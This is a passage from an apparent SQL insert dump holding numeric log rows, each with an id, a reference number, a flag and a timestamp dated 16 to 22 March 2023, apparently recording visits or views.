06:02:07'),(71705,80,1,'2023-03-16','2023-03-16 07:38:31'),(71706,4768,1,'2023-03-16','2023-03-16 08:24:28'),(71707,4520,1,'2023-03-16','2023-03-16 08:34:39'),(71708,4966,1,'2023-03-16','2023-03-16 08:47:50'),(71709,5080,1,'2023-03-16','2023-03-16 09:33:23'),(71710,1544,1,'2023-03-16','2023-03-16 09:45:42'),(71711,1544,1,'2023-03-16','2023-03-16 09:53:56'),(71712,4341,1,'2023-03-16','2023-03-16 09:59:02'),(71713,467,1,'2023-03-16','2023-03-16 10:02:16'),(71714,89,1,'2023-03-16','2023-03-16 10:18:13'),(71715,3746,1,'2023-03-16','2023-03-16 10:25:59'),(71716,3083,1,'2023-03-16','2023-03-16 10:39:13'),(71717,80,1,'2023-03-16','2023-03-16 10:46:01'),(71718,1602,1,'2023-03-16','2023-03-16 10:53:06'),(71719,3102,1,'2023-03-16','2023-03-16 11:04:11'),(71720,1582,1,'2023-03-16','2023-03-16 11:04:36'),(71721,4387,1,'2023-03-16','2023-03-16 11:04:41'),(71722,5163,1,'2023-03-16','2023-03-16 11:21:43'),(71723,1594,1,'2023-03-16','2023-03-16 11:40:13'),(71724,68,1,'2023-03-16','2023-03-16 11:42:36'),(71725,1594,1,'2023-03-16','2023-03-16 11:45:58'),(71726,4911,1,'2023-03-16','2023-03-16 12:26:37'),(71727,3781,1,'2023-03-16','2023-03-16 12:33:13'),(71728,4412,1,'2023-03-16','2023-03-16 12:33:27'),(71729,3229,1,'2023-03-16','2023-03-16 12:35:00'),(71730,1582,1,'2023-03-16','2023-03-16 14:01:30'),(71731,1594,1,'2023-03-16','2023-03-16 14:06:17'),(71732,1594,1,'2023-03-16','2023-03-16 14:08:00'),(71733,470,1,'2023-03-16','2023-03-16 14:24:19'),(71734,2297,1,'2023-03-16','2023-03-16 14:57:22'),(71735,3430,1,'2023-03-16','2023-03-16 14:57:38'),(71736,2410,1,'2023-03-16','2023-03-16 15:22:51'),(71737,3092,1,'2023-03-16','2023-03-16 15:31:29'),(71738,5271,1,'2023-03-16','2023-03-16 15:44:29'),(71739,1602,1,'2023-03-16','2023-03-16 16:00:40'),(71740,3226,1,'2023-03-16','2023-03-16 16:16:56'),(71741,1544,1,'2023-03-16','2023-03-16 16:27:22'),(71742,76,1,'2023-03-16','2023-03-16 16:34:06'),(71743,84,1,'2023-03-16','2023-03-16 16:41:41'),(71744,1602,1,'2023-03-16','2023-03-16 16:51:12'),(71745,4556,1,'2023-03-16','2023-03-16 17:07:50'),(71746,4556,1,'2023-03-16','2023-03-16 17:08:15'),(71747,4556,1,'2023-03-16','2023-03-16 17:09:54'),(71748,3781,1,'2023-03-16','2023-03-16 17:40:53'),(71749,3781,1,'2023-03-16','2023-03-16 17:47:41'),(71750,1722,1,'2023-03-16','2023-03-16 17:57:30'),(71751,1722,1,'2023-03-16','2023-03-16 18:29:57'),(71752,1747,1,'2023-03-16','2023-03-16 18:40:46'),(71753,5280,1,'2023-03-16','2023-03-16 19:02:18'),(71754,1722,1,'2023-03-16','2023-03-16 19:06:15'),(71755,3092,1,'2023-03-16','2023-03-16 19:21:57'),(71756,4338,1,'2023-03-16','2023-03-16 19:30:05'),(71757,5080,1,'2023-03-16','2023-03-16 20:16:23'),(71758,4391,1,'2023-03-16','2023-03-16 20:30:30'),(71759,1877,1,'2023-03-16','2023-03-16 21:30:06'),(71760,1544,1,'2023-03-16','2023-03-16 22:00:04'),(71761,4529,1,'2023-03-16','2023-03-16 22:00:05'),(71762,5280,1,'2023-03-16','2023-03-16 22:02:21'),(71763,1598,1,'2023-03-16','2023-03-16 22:30:02'),(71764,1598,1,'2023-03-17','2023-03-17 00:30:11'),(71765,5253,1,'2023-03-17','2023-03-17 00:39:03'),(71766,87,1,'2023-03-17','2023-03-17 01:16:49'),(71767,2989,1,'2023-03-17','2023-03-17 02:01:45'),(71768,4944,1,'2023-03-17','2023-03-17 02:34:56'),(71769,80,1,'2023-03-17','2023-03-17 02:35:14'),(71770,4944,1,'2023-03-17','2023-03-17 02:36:38'),(71771,1610,1,'2023-03-17','2023-03-17 03:54:10'),(71772,2297,1,'2023-03-17','2023-03-17 04:50:03'),(71773,74,1,'2023-03-17','2023-03-17 06:50:10'),(71774,5256,1,'2023-03-17','2023-03-17 07:35:16'),(71775,5256,1,'2023-03-17','2023-03-17 07:39:24'),(71776,76,1,'2023-03-17','2023-03-17 09:05:59'),(71777,4654,1,'2023-03-17','2023-03-17 09:33:47'),(71778,4556,1,'2023-03-17','2023-03-17 09:40:02'),(71779,1594,1,'2023-03-17','2023-03-17 09:50:52'),(71780,80,1,'2023-03-17','2023-03-17 09:51:06'),(71781,68,1,'2023-03-17','2023-03-17 09:51:17'),(71782,4663,1,'2023-03-17','2023-03-17 10:00:03'),(71783,4622,1,'2023-03-17','2023-03-17 10:09:11'),(71784,4608,1,'2023-03-17','2023-03-17 10:09:19'),(71785,4911,1,'2023-03-17','2023-03-17 10:10:14'),(71786,1596,1,'2023-03-17','2023-03-17 10:13:39'),(71787,5071,1,'2023-03-17','2023-03-17 10:28:39'),(71788,91,1,'2023-03-17','2023-03-17 11:00:27'),(71789,3045,1,'2023-03-17','2023-03-17 11:30:06'),(71790,1594,1,'2023-03-17','2023-03-17 11:33:43'),(71791,68,1,'2023-03-17','2023-03-17 11:34:33'),(71792,1594,1,'2023-03-17','2023-03-17 11:37:28'),(71793,1594,1,'2023-03-17','2023-03-17 11:37:58'),(71794,4457,1,'2023-03-17','2023-03-17 11:47:32'),(71795,4323,1,'2023-03-17','2023-03-17 12:00:12'),(71796,91,1,'2023-03-17','2023-03-17 12:30:45'),(71797,91,1,'2023-03-17','2023-03-17 12:43:20'),(71798,5163,1,'2023-03-17','2023-03-17 13:43:13'),(71799,5163,1,'2023-03-17','2023-03-17 13:44:00'),(71800,1608,1,'2023-03-17','2023-03-17 14:01:02'),(71801,1701,1,'2023-03-17','2023-03-17 14:03:27'),(71802,4556,1,'2023-03-17','2023-03-17 14:21:52'),(71803,76,1,'2023-03-17','2023-03-17 14:25:11'),(71804,91,1,'2023-03-17','2023-03-17 14:25:44'),(71805,2309,1,'2023-03-17','2023-03-17 14:30:07'),(71806,4608,1,'2023-03-17','2023-03-17 14:31:07'),(71807,91,1,'2023-03-17','2023-03-17 14:41:44'),(71808,4612,1,'2023-03-17','2023-03-17 14:45:03'),(71809,5157,1,'2023-03-17','2023-03-17 15:30:06'),(71810,80,1,'2023-03-17','2023-03-17 15:40:32'),(71811,4391,1,'2023-03-17','2023-03-17 15:47:38'),(71812,4238,1,'2023-03-17','2023-03-17 16:00:03'),(71813,4556,1,'2023-03-17','2023-03-17 16:20:25'),(71814,4412,1,'2023-03-17','2023-03-17 16:24:14'),(71815,1718,1,'2023-03-17','2023-03-17 17:30:30'),(71816,2178,1,'2023-03-17','2023-03-17 18:01:06'),(71817,1544,1,'2023-03-17','2023-03-17 19:39:03'),(71818,4520,1,'2023-03-17','2023-03-17 20:02:33'),(71819,2904,1,'2023-03-17','2023-03-17 21:00:01'),(71820,2609,1,'2023-03-17','2023-03-17 21:02:46'),(71821,68,1,'2023-03-17','2023-03-17 21:07:35'),(71822,4960,1,'2023-03-17','2023-03-17 22:04:14'),(71823,1608,1,'2023-03-17','2023-03-17 22:24:49'),(71824,4944,1,'2023-03-17','2023-03-17 22:37:25'),(71825,1602,1,'2023-03-17','2023-03-17 22:55:12'),(71826,1602,1,'2023-03-17','2023-03-17 23:10:50'),(71827,2769,1,'2023-03-17','2023-03-17 23:32:26'),(71828,2154,1,'2023-03-18','2023-03-18 00:02:41'),(71829,91,1,'2023-03-18','2023-03-18 00:29:46'),(71830,3752,1,'2023-03-18','2023-03-18 00:47:37'),(71831,468,1,'2023-03-18','2023-03-18 00:52:53'),(71832,3691,1,'2023-03-18','2023-03-18 01:04:59'),(71833,1594,1,'2023-03-18','2023-03-18 01:49:51'),(71834,2769,1,'2023-03-18','2023-03-18 02:34:47'),(71835,4960,1,'2023-03-18','2023-03-18 03:01:16'),(71836,3030,1,'2023-03-18','2023-03-18 04:04:49'),(71837,2154,1,'2023-03-18','2023-03-18 04:32:38'),(71838,4911,1,'2023-03-18','2023-03-18 04:47:57'),(71839,1600,1,'2023-03-18','2023-03-18 05:19:44'),(71840,76,1,'2023-03-18','2023-03-18 05:36:35'),(71841,91,1,'2023-03-18','2023-03-18 05:38:21'),(71842,4591,1,'2023-03-18','2023-03-18 05:42:08'),(71843,91,1,'2023-03-18','2023-03-18 05:45:20'),(71844,5062,1,'2023-03-18','2023-03-18 05:48:06'),(71845,5080,1,'2023-03-18','2023-03-18 06:01:16'),(71846,5080,1,'2023-03-18','2023-03-18 06:01:17'),(71847,91,1,'2023-03-18','2023-03-18 06:03:45'),(71848,5248,1,'2023-03-18','2023-03-18 06:04:12'),(71849,5248,1,'2023-03-18','2023-03-18 06:04:13'),(71850,1544,1,'2023-03-18','2023-03-18 06:14:03'),(71851,4556,1,'2023-03-18','2023-03-18 06:19:37'),(71852,91,1,'2023-03-18','2023-03-18 06:24:53'),(71853,5140,1,'2023-03-18','2023-03-18 06:32:11'),(71854,4485,1,'2023-03-18','2023-03-18 06:38:52'),(71855,1596,1,'2023-03-18','2023-03-18 06:38:54'),(71856,4556,1,'2023-03-18','2023-03-18 07:23:17'),(71857,472,1,'2023-03-18','2023-03-18 08:07:14'),(71858,3259,1,'2023-03-18','2023-03-18 08:49:40'),(71859,1594,1,'2023-03-18','2023-03-18 09:10:15'),(71860,1594,1,'2023-03-18','2023-03-18 09:51:33'),(71861,335,1,'2023-03-18','2023-03-18 09:51:59'),(71862,1594,1,'2023-03-18','2023-03-18 09:52:30'),(71863,4556,1,'2023-03-18','2023-03-18 10:11:27'),(71864,4556,1,'2023-03-18','2023-03-18 10:11:32'),(71865,4556,1,'2023-03-18','2023-03-18 10:26:04'),(71866,4556,1,'2023-03-18','2023-03-18 10:26:10'),(71867,4556,1,'2023-03-18','2023-03-18 10:26:15'),(71868,1596,1,'2023-03-18','2023-03-18 10:58:15'),(71869,4911,1,'2023-03-18','2023-03-18 11:51:02'),(71870,4911,1,'2023-03-18','2023-03-18 12:33:32'),(71871,4966,1,'2023-03-18','2023-03-18 12:53:57'),(71872,4556,1,'2023-03-18','2023-03-18 13:23:43'),(71873,4966,1,'2023-03-18','2023-03-18 13:23:52'),(71874,1594,1,'2023-03-18','2023-03-18 14:04:08'),(71875,3764,1,'2023-03-18','2023-03-18 14:19:30'),(71876,1594,1,'2023-03-18','2023-03-18 14:22:42'),(71877,5163,1,'2023-03-18','2023-03-18 16:41:01'),(71878,5163,1,'2023-03-18','2023-03-18 16:49:00'),(71879,87,1,'2023-03-18','2023-03-18 17:04:08'),(71880,488,1,'2023-03-18','2023-03-18 17:04:51'),(71881,4938,1,'2023-03-18','2023-03-18 17:04:54'),(71882,108,1,'2023-03-18','2023-03-18 17:05:19'),(71883,76,1,'2023-03-18','2023-03-18 17:07:40'),(71884,91,1,'2023-03-18','2023-03-18 17:08:15'),(71885,4862,1,'2023-03-18','2023-03-18 17:12:34'),(71886,91,1,'2023-03-18','2023-03-18 17:16:08'),(71887,5259,1,'2023-03-18','2023-03-18 17:17:04'),(71888,5259,1,'2023-03-18','2023-03-18 17:17:05'),(71889,4911,1,'2023-03-18','2023-03-18 17:34:45'),(71890,3764,1,'2023-03-18','2023-03-18 18:14:19'),(71891,4387,1,'2023-03-18','2023-03-18 18:35:16'),(71892,4457,1,'2023-03-18','2023-03-18 20:31:12'),(71893,4980,1,'2023-03-18','2023-03-18 20:43:01'),(71894,2964,1,'2023-03-18','2023-03-18 20:56:05'),(71895,5256,1,'2023-03-18','2023-03-18 20:59:10'),(71896,4387,1,'2023-03-18','2023-03-18 21:44:03'),(71897,80,1,'2023-03-18','2023-03-18 22:00:16'),(71898,3781,1,'2023-03-18','2023-03-18 22:03:14'),(71899,2904,1,'2023-03-19','2023-03-19 01:21:20'),(71900,1737,1,'2023-03-19','2023-03-19 02:35:18'),(71901,3079,1,'2023-03-19','2023-03-19 03:54:47'),(71902,4980,1,'2023-03-19','2023-03-19 04:34:07'),(71903,4938,1,'2023-03-19','2023-03-19 04:43:49'),(71904,5256,1,'2023-03-19','2023-03-19 05:28:48'),(71905,5256,1,'2023-03-19','2023-03-19 06:13:50'),(71906,4542,1,'2023-03-19','2023-03-19 06:25:49'),(71907,5271,1,'2023-03-19','2023-03-19 07:46:38'),(71908,4301,1,'2023-03-19','2023-03-19 08:20:57'),(71909,1594,1,'2023-03-19','2023-03-19 08:43:19'),(71910,2309,1,'2023-03-19','2023-03-19 09:44:18'),(71911,4911,1,'2023-03-19','2023-03-19 10:00:12'),(71912,3226,1,'2023-03-19','2023-03-19 10:02:04'),(71913,3226,1,'2023-03-19','2023-03-19 10:02:04'),(71914,3243,1,'2023-03-19','2023-03-19 10:23:34'),(71915,1588,1,'2023-03-19','2023-03-19 12:15:32'),(71916,5163,1,'2023-03-19','2023-03-19 13:14:34'),(71917,5163,1,'2023-03-19','2023-03-19 13:14:36'),(71918,80,1,'2023-03-19','2023-03-19 13:14:59'),(71919,5163,1,'2023-03-19','2023-03-19 13:16:03'),(71920,5163,1,'2023-03-19','2023-03-19 13:16:11'),(71921,5163,1,'2023-03-19','2023-03-19 13:18:48'),(71922,2159,1,'2023-03-19','2023-03-19 13:51:08'),(71923,2309,1,'2023-03-19','2023-03-19 13:59:30'),(71924,2159,1,'2023-03-19','2023-03-19 14:02:46'),(71925,4911,1,'2023-03-19','2023-03-19 14:30:05'),(71926,3764,1,'2023-03-19','2023-03-19 14:52:34'),(71927,5062,1,'2023-03-19','2023-03-19 15:43:23'),(71928,3226,1,'2023-03-19','2023-03-19 16:27:37'),(71929,4963,1,'2023-03-19','2023-03-19 17:07:50'),(71930,1772,1,'2023-03-19','2023-03-19 17:44:32'),(71931,1582,1,'2023-03-19','2023-03-19 18:28:06'),(71932,4960,1,'2023-03-19','2023-03-19 18:47:11'),(71933,4608,1,'2023-03-19','2023-03-19 18:50:07'),(71934,1582,1,'2023-03-19','2023-03-19 19:08:31'),(71935,4960,1,'2023-03-19','2023-03-19 19:22:21'),(71936,4391,1,'2023-03-19','2023-03-19 19:46:14'),(71937,3287,1,'2023-03-19','2023-03-19 20:09:39'),(71938,5122,1,'2023-03-19','2023-03-19 21:22:06'),(71939,3090,1,'2023-03-19','2023-03-19 21:22:47'),(71940,80,1,'2023-03-19','2023-03-19 22:25:57'),(71941,4524,1,'2023-03-19','2023-03-19 22:39:50'),(71942,4674,1,'2023-03-19','2023-03-19 22:55:56'),(71943,1600,1,'2023-03-19','2023-03-19 23:48:12'),(71944,4950,1,'2023-03-20','2023-03-20 00:12:58'),(71945,4685,1,'2023-03-20','2023-03-20 00:30:53'),(71946,4776,1,'2023-03-20','2023-03-20 00:31:18'),(71947,1614,1,'2023-03-20','2023-03-20 00:33:11'),(71948,1870,1,'2023-03-20','2023-03-20 00:46:06'),(71949,473,1,'2023-03-20','2023-03-20 00:46:09'),(71950,4688,1,'2023-03-20','2023-03-20 00:53:06'),(71951,4688,1,'2023-03-20','2023-03-20 01:14:38'),(71952,1604,1,'2023-03-20','2023-03-20 01:38:22'),(71953,84,1,'2023-03-20','2023-03-20 01:38:32'),(71954,1604,1,'2023-03-20','2023-03-20 01:38:41'),(71955,3313,1,'2023-03-20','2023-03-20 01:58:09'),(71956,4332,1,'2023-03-20','2023-03-20 02:36:07'),(71957,84,1,'2023-03-20','2023-03-20 02:36:48'),(71958,5253,1,'2023-03-20','2023-03-20 03:04:09'),(71959,4332,1,'2023-03-20','2023-03-20 03:21:06'),(71960,4688,1,'2023-03-20','2023-03-20 03:40:12'),(71961,4960,1,'2023-03-20','2023-03-20 04:06:09'),(71962,1766,1,'2023-03-20','2023-03-20 04:06:46'),(71963,110,1,'2023-03-20','2023-03-20 04:51:10'),(71964,4911,1,'2023-03-20','2023-03-20 04:51:43'),(71965,1586,1,'2023-03-20','2023-03-20 05:43:37'),(71966,4420,1,'2023-03-20','2023-03-20 06:03:54'),(71967,4520,1,'2023-03-20','2023-03-20 06:10:43'),(71968,4612,1,'2023-03-20','2023-03-20 06:21:44'),(71969,4457,1,'2023-03-20','2023-03-20 06:33:47'),(71970,1586,1,'2023-03-20','2023-03-20 07:17:42'),(71971,5271,1,'2023-03-20','2023-03-20 07:32:57'),(71972,4485,1,'2023-03-20','2023-03-20 07:36:12'),(71973,4424,1,'2023-03-20','2023-03-20 07:36:15'),(71974,80,1,'2023-03-20','2023-03-20 08:00:57'),(71975,1606,1,'2023-03-20','2023-03-20 08:04:20'),(71976,4485,1,'2023-03-20','2023-03-20 08:21:11'),(71977,4845,1,'2023-03-20','2023-03-20 08:25:39'),(71978,4842,1,'2023-03-20','2023-03-20 08:26:47'),(71979,4837,1,'2023-03-20','2023-03-20 08:26:48'),(71980,4840,1,'2023-03-20','2023-03-20 08:26:48'),(71981,4835,1,'2023-03-20','2023-03-20 08:26:48'),(71982,4832,1,'2023-03-20','2023-03-20 08:26:50'),(71983,4830,1,'2023-03-20','2023-03-20 08:27:04'),(71984,4827,1,'2023-03-20','2023-03-20 08:27:06'),(71985,4738,1,'2023-03-20','2023-03-20 08:27:25'),(71986,4950,1,'2023-03-20','2023-03-20 09:06:15'),(71987,1722,1,'2023-03-20','2023-03-20 09:44:32'),(71988,4556,1,'2023-03-20','2023-03-20 10:46:23'),(71989,4930,1,'2023-03-20','2023-03-20 10:49:18'),(71990,4911,1,'2023-03-20','2023-03-20 10:50:02'),(71991,472,1,'2023-03-20','2023-03-20 10:51:44'),(71992,4556,1,'2023-03-20','2023-03-20 11:29:03'),(71993,1614,1,'2023-03-20','2023-03-20 11:29:25'),(71994,4556,1,'2023-03-20','2023-03-20 11:37:49'),(71995,4556,1,'2023-03-20','2023-03-20 11:40:28'),(71996,467,1,'2023-03-20','2023-03-20 11:46:44'),(71997,3226,1,'2023-03-20','2023-03-20 12:18:58'),(71998,4963,1,'2023-03-20','2023-03-20 12:21:10'),(71999,1544,1,'2023-03-20','2023-03-20 12:33:23'),(72000,1582,1,'2023-03-20','2023-03-20 12:35:51'),(72001,1608,1,'2023-03-20','2023-03-20 12:42:31'),(72002,1588,1,'2023-03-20','2023-03-20 12:47:07'),(72003,4983,1,'2023-03-20','2023-03-20 12:58:30'),(72004,4612,1,'2023-03-20','2023-03-20 13:16:47'),(72005,1586,1,'2023-03-20','2023-03-20 13:28:20'),(72006,1586,1,'2023-03-20','2023-03-20 13:31:25'),(72007,4870,1,'2023-03-20','2023-03-20 14:02:05'),(72008,4391,1,'2023-03-20','2023-03-20 15:25:36'),(72009,472,1,'2023-03-20','2023-03-20 15:48:18'),(72010,1703,1,'2023-03-20','2023-03-20 16:41:09'),(72011,1614,1,'2023-03-20','2023-03-20 16:59:32'),(72012,570,1,'2023-03-20','2023-03-20 17:37:33'),(72013,5259,1,'2023-03-20','2023-03-20 17:40:41'),(72014,3004,1,'2023-03-20','2023-03-20 17:41:09'),(72015,4612,1,'2023-03-20','2023-03-20 17:47:20'),(72016,1544,1,'2023-03-20','2023-03-20 17:58:46'),(72017,1588,1,'2023-03-20','2023-03-20 18:20:06'),(72018,3251,1,'2023-03-20','2023-03-20 18:34:53'),(72019,2751,1,'2023-03-20','2023-03-20 18:55:18'),(72020,3498,1,'2023-03-20','2023-03-20 19:00:36'),(72021,5080,1,'2023-03-20','2023-03-20 19:14:23'),(72022,108,1,'2023-03-20','2023-03-20 19:44:02'),(72023,3226,1,'2023-03-20','2023-03-20 20:42:56'),(72024,4566,1,'2023-03-20','2023-03-20 20:43:37'),(72025,5259,1,'2023-03-20','2023-03-20 21:42:44'),(72026,4566,1,'2023-03-20','2023-03-20 21:55:24'),(72027,2964,1,'2023-03-20','2023-03-20 22:39:10'),(72028,2964,1,'2023-03-20','2023-03-20 22:40:05'),(72029,91,1,'2023-03-21','2023-03-21 00:03:18'),(72030,4556,1,'2023-03-21','2023-03-21 00:27:38'),(72031,80,1,'2023-03-21','2023-03-21 00:29:47'),(72032,89,1,'2023-03-21','2023-03-21 00:36:18'),(72033,68,1,'2023-03-21','2023-03-21 00:37:32'),(72034,89,1,'2023-03-21','2023-03-21 00:45:00'),(72035,4556,1,'2023-03-21','2023-03-21 00:46:00'),(72036,4668,1,'2023-03-21','2023-03-21 00:49:16'),(72037,3226,1,'2023-03-21','2023-03-21 02:35:17'),(72038,1695,1,'2023-03-21','2023-03-21 03:11:41'),(72039,4874,1,'2023-03-21','2023-03-21 04:23:50'),(72040,2904,1,'2023-03-21','2023-03-21 05:56:13'),(72041,2309,1,'2023-03-21','2023-03-21 06:33:40'),(72042,4674,1,'2023-03-21','2023-03-21 06:41:15'),(72043,4963,1,'2023-03-21','2023-03-21 08:11:19'),(72044,1544,1,'2023-03-21','2023-03-21 08:26:35'),(72045,3781,1,'2023-03-21','2023-03-21 08:45:52'),(72046,3781,1,'2023-03-21','2023-03-21 08:48:08'),(72047,488,1,'2023-03-21','2023-03-21 09:39:36'),(72048,5163,1,'2023-03-21','2023-03-21 10:32:28'),(72049,80,1,'2023-03-21','2023-03-21 10:32:37'),(72050,5163,1,'2023-03-21','2023-03-21 10:33:50'),(72051,91,1,'2023-03-21','2023-03-21 10:42:17'),(72052,4608,1,'2023-03-21','2023-03-21 10:42:36'),(72053,3226,1,'2023-03-21','2023-03-21 10:50:50'),(72054,3691,1,'2023-03-21','2023-03-21 11:11:19'),(72055,1703,1,'2023-03-21','2023-03-21 11:19:19'),(72056,4301,1,'2023-03-21','2023-03-21 12:41:19'),(72057,1612,1,'2023-03-21','2023-03-21 14:16:07'),(72058,1586,1,'2023-03-21','2023-03-21 14:25:15'),(72059,481,1,'2023-03-21','2023-03-21 14:31:32'),(72060,1612,1,'2023-03-21','2023-03-21 15:31:20'),(72061,1612,1,'2023-03-21','2023-03-21 15:32:18'),(72062,1586,1,'2023-03-21','2023-03-21 15:33:53'),(72063,5080,1,'2023-03-21','2023-03-21 15:41:18'),(72064,4608,1,'2023-03-21','2023-03-21 15:48:35'),(72065,570,1,'2023-03-21','2023-03-21 15:55:34'),(72066,1586,1,'2023-03-21','2023-03-21 15:57:42'),(72067,3023,1,'2023-03-21','2023-03-21 16:11:10'),(72068,4608,1,'2023-03-21','2023-03-21 16:12:43'),(72069,4911,1,'2023-03-21','2023-03-21 16:43:32'),(72070,4457,1,'2023-03-21','2023-03-21 16:45:41'),(72071,1728,1,'2023-03-21','2023-03-21 16:45:43'),(72072,4391,1,'2023-03-21','2023-03-21 17:07:28'),(72073,4944,1,'2023-03-21','2023-03-21 17:42:21'),(72074,4520,1,'2023-03-21','2023-03-21 17:58:23'),(72075,335,1,'2023-03-21','2023-03-21 18:05:27'),(72076,4485,1,'2023-03-21','2023-03-21 18:54:14'),(72077,4485,1,'2023-03-21','2023-03-21 19:32:05'),(72078,4966,1,'2023-03-21','2023-03-21 20:49:02'),(72079,4966,1,'2023-03-21','2023-03-21 20:50:31'),(72080,2248,1,'2023-03-21','2023-03-21 20:55:45'),(72081,5163,1,'2023-03-21','2023-03-21 20:59:37'),(72082,1598,1,'2023-03-21','2023-03-21 21:11:45'),(72083,4329,1,'2023-03-21','2023-03-21 22:23:25'),(72084,3004,1,'2023-03-21','2023-03-21 22:49:36'),(72085,4944,1,'2023-03-21','2023-03-21 23:09:36'),(72086,4301,1,'2023-03-21','2023-03-21 23:13:30'),(72087,1722,1,'2023-03-21','2023-03-21 23:18:04'),(72088,3691,1,'2023-03-21','2023-03-21 23:56:13'),(72089,4709,1,'2023-03-22','2023-03-22 00:20:39'),(72090,3691,1,'2023-03-22','2023-03-22 00:49:14'),(72091,1720,1,'2023-03-22','2023-03-22 01:18:40'),(72092,1703,1,'2023-03-22','2023-03-22 01:43:21'),(72093,3531,1,'2023-03-22','2023-03-22 01:57:43'),(72094,1604,1,'2023-03-22','2023-03-22 02:26:04'),(72095,1604,1,'2023-03-22','2023-03-22 02:27:57'),(72096,3261,1,'2023-03-22','2023-03-22 03:01:45'),(72097,473,1,'2023-03-22','2023-03-22 03:03:43'),(72098,4529,1,'2023-03-22','2023-03-22 03:49:08'),(72099,3261,1,'2023-03-22','2023-03-22 04:31:55'),(72100,487,1,'2023-03-22','2023-03-22 04:37:50'),(72101,3486,1,'2023-03-22','2023-03-22 05:28:44'),(72102,84,1,'2023-03-22','2023-03-22 05:44:17'),(72103,3290,1,'2023-03-22','2023-03-22 06:15:35'),(72104,1608,1,'2023-03-22','2023-03-22 06:16:01'),(72105,80,1,'2023-03-22','2023-03-22 06:16:15'),(72106,474,1,'2023-03-22','2023-03-22 06:26:09'),(72107,1606,1,'2023-03-22','2023-03-22 07:43:48'),(72108,80,1,'2023-03-22','2023-03-22 07:44:04'),(72109,1606,1,'2023-03-22','2023-03-22 07:44:27'),(72110,335,1,'2023-03-22','2023-03-22 07:49:20'),(72111,5076,1,'2023-03-22','2023-03-22 08:29:58'),(72112,1608,1,'2023-03-22','2023-03-22 08:37:44'),(72113,2558,1,'2023-03-22','2023-03-22 08:38:59'),(72114,2558,1,'2023-03-22','2023-03-22 08:40:36'),(72115,5280,1,'2023-03-22','2023-03-22 09:03:43'),(72116,468,1,'2023-03-22','2023-03-22 09:19:14'),(72117,87,1,'2023-03-22','2023-03-22 09:22:04'),(72118,1586,1,'2023-03-22','2023-03-22 09:23:16'),(72119,4797,1,'2023-03-22','2023-03-22 09:25:20'),(72120,4416,1,'2023-03-22','2023-03-22 10:18:30'),(72121,1596,1,'2023-03-22','2023-03-22 10:39:30'),(72122,1586,1,'2023-03-22','2023-03-22 11:04:15'),(72123,5163,1,'2023-03-22','2023-03-22 11:28:37'),(72124,1582,1,'2023-03-22','2023-03-22 11:45:26'),(72125,5289,1,'2023-03-22','2023-03-22 12:10:28'),(72126,5292,1,'2023-03-22','2023-03-22 12:10:33'),(72127,5298,1,'2023-03-22','2023-03-22 12:10:34'),(72128,5298,1,'2023-03-22','2023-03-22 12:10:36'),(72129,5295,1,'2023-03-22','2023-03-22 12:11:19'),(72130,5295,1,'2023-03-22','2023-03-22 12:11:22'),(72131,5292,1,'2023-03-22','2023-03-22 12:17:28'),(72132,4966,1,'2023-03-22','2023-03-22 13:03:51'),(72133,2395,1,'2023-03-22','2023-03-22 13:11:41'),(72134,1596,1,'2023-03-22','2023-03-22 13:17:37'),(72135,2609,1,'2023-03-22','2023-03-22 13:26:14'),(72136,4963,1,'2023-03-22','2023-03-22 13:31:55'),(72137,4963,1,'2023-03-22','2023-03-22 13:32:43'),(72138,4963,1,'2023-03-22','2023-03-22 13:33:09'),(72139,4963,1,'2023-03-22','2023-03-22 13:34:08'),(72140,68,1,'2023-03-22','2023-03-22 13:34:22'),(72141,4963,1,'2023-03-22','2023-03-22 13:34:32'),(72142,5080,1,'2023-03-22','2023-03-22 13:41:57'),(72143,5080,1,'2023-03-22','2023-03-22 13:42:49'),(72144,4911,1,'2023-03-22','2023-03-22 13:45:30'),(72145,1544,1,'2023-03-22','2023-03-22 14:26:56'),(72146,4960,1,'2023-03-22','2023-03-22 14:26:56'),(72147,1544,1,'2023-03-22','2023-03-22 14:27:15'),(72148,3691,1,'2023-03-22','2023-03-22 14:30:19'),(72149,1703,1,'2023-03-22','2023-03-22 14:43:33'),(72150,468,1,'2023-03-22','2023-03-22 15:02:08'),(72151,1612,1,'2023-03-22','2023-03-22 15:04:16'),(72152,1604,1,'2023-03-22','2023-03-22 15:08:46'),(72153,477,1,'2023-03-22','2023-03-22 15:09:12'),(72154,470,1,'2023-03-22','2023-03-22 15:12:38'),(72155,470,1,'2023-03-22','2023-03-22 15:12:51'),(72156,1872,1,'2023-03-22','2023-03-22 15:15:56'),(72157,1877,1,'2023-03-22','2023-03-22 15:20:10'),(72158,1877,1,'2023-03-22','2023-03-22 15:23:16'),(72159,4681,1,'2023-03-22','2023-03-22 15:25:37'),(72160,4691,1,'2023-03-22','2023-03-22 15:32:47'),(72161,4697,1,'2023-03-22','2023-03-22 15:38:07'),(72162,3531,1,'2023-03-22','2023-03-22 15:45:51'),(72163,3290,1,'2023-03-22','2023-03-22 15:48:19'),(72164,3706,1,'2023-03-22','2023-03-22 15:49:04'),(72165,4694,1,'2023-03-22','2023-03-22 15:51:09'),(72166,3083,1,'2023-03-22','2023-03-22 15:51:39'),(72167,5163,1,'2023-03-22','2023-03-22 15:59:24'),(72168,4706,1,'2023-03-22','2023-03-22 16:04:39'),(72169,4700,1,'2023-03-22','2023-03-22 16:16:34'),(72170,1612,1,'2023-03-22','2023-03-22 16:24:52'),(72171,5256,1,'2023-03-22','2023-03-22 16:29:33'),(72172,89,1,'2023-03-22','2023-03-22 16:36:04'),(72173,5071,1,'2023-03-22','2023-03-22 16:36:38'),(72174,87,1,'2023-03-22','2023-03-22 16:36:45'),(72175,1600,1,'2023-03-22','2023-03-22 16:37:53'),(72176,471,1,'2023-03-22','2023-03-22 16:40:59'),(72177,479,1,'2023-03-22','2023-03-22 16:41:11'),(72178,477,1,'2023-03-22','2023-03-22 16:41:47'),(72179,108,1,'2023-03-22','2023-03-22 16:46:54'),(72180,91,1,'2023-03-22','2023-03-22 16:49:55'),(72181,5067,1,'2023-03-22','2023-03-22 16:51:24'),(72182,5046,1,'2023-03-22','2023-03-22 16:53:36'),(72183,4709,1,'2023-03-22','2023-03-22 16:55:04'),(72184,5292,1,'2023-03-22','2023-03-22 16:56:57'),(72185,5298,1,'2023-03-22','2023-03-22 16:57:04'),(72186,5295,1,'2023-03-22','2023-03-22 16:57:14'),(72187,5295,1,'2023-03-22','2023-03-22 16:57:22'),(72188,5289,1,'2023-03-22','2023-03-22 16:57:25'),(72189,5289,1,'2023-03-22','2023-03-22 16:57:27'),(72190,5295,1,'2023-03-22','2023-03-22 